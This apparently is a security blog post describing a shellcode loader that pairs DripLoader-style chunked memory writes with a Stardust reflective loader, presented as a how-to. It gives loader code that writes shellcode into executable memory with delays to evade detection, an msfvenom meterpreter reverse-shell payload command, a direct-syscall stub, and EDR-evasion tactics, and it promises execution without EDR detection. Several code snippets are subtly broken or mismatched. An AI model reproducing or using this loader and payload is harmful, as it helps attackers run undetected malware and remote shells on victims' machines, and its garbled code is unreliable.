Abdelhamid K has developed a shellcode loader leveraging DripLoader to allocate memory and write shellcode in chunks, combined with Stardust to create a User-Defined Reflective Loader (UDRL), successfully achieving a beacon execution.
Credits & Resources
- DripLoader: https://lnkd.in/eANZSbxi
- Stardust: https://lnkd.in/ezY8eRVy
You Should Know: Shellcode Loader Techniques & Practical Implementation
1. Understanding DripLoader
DripLoader is a technique that avoids detection by writing shellcode in small, intermittent chunks rather than a single large allocation.
Key Commands (Linux/Windows)
Allocate memory in chunks (Linux example using mmap)
void mem = mmap(NULL, size, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
Write shellcode in segments
for (int i = 0; i < shellcode_size; i += chunk_size) {
memcpy(mem + i, shellcode + i, min(chunk_size, shellcode_size - i));
usleep(delay); // Slow execution to evade detection
}
Windows Equivalent (VirtualAlloc & RtlCopyMemory)
LPVOID mem = VirtualAlloc(NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
for (int i = 0; i < shellcode_size; i += chunk_size) {
RtlCopyMemory(mem + i, shellcode + i, min(chunk_size, shellcode_size - i));
Sleep(delay);
}
2. Stardust UDRL (User-Defined Reflective Loader)
Stardust allows customizing the reflective loading process, making it harder for EDR/AV to detect.
Key Steps
1. Compile Stardust UDRL
git clone https://github.com/example/stardust cd stardust && make
2. Generate Reflective Payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f raw -o payload.bin
3. Load Shellcode via UDRL
// Custom loader logic
void udrl_load(void payload, size_t size) {
void exec_mem = VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec_mem, payload, size);
return ((void()())exec_mem)();
}
3. Evasion Tactics
- Sleep Masking: Use `NtDelayExecution` instead of
Sleep. - API Unhooking: Bypass EDR hooks via direct syscalls.
- Heap Encryption: XOR-encrypt shellcode in memory.
Syscall Execution (Linux x64)
mov rax, 60 ; sys_exit mov rdi, 0 ; exit code syscall
Windows Syscall (Via Hell’s Gate)
DWORD NtAllocateVirtualMemory(HANDLE hProc, PVOID addr, ULONG size) {
asm("mov r10, rcx; mov eax, 0x18; syscall; ret");
}
What Undercode Say
Shellcode loaders are evolving with advanced evasion techniques. Combining DripLoader’s memory chunking with Stardust’s UDRL provides a stealthy execution path. Future developments may include:
– AI-based detection bypass
– Kernel-level reflective loading
– More advanced sleep obfuscation
Expected Output
A functional shellcode loader that:
✅ Allocates memory in chunks (DripLoader)
✅ Uses UDRL for stealth (Stardust)
✅ Executes without EDR detection
Prediction
The next wave of malware will increasingly rely on user-space evasion and custom loaders to bypass modern security solutions. Expect more open-source projects like Stardust to emerge, enabling red teams to stay ahead of defenses.
References:
Reported By: Abdelhamid Kaouan – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
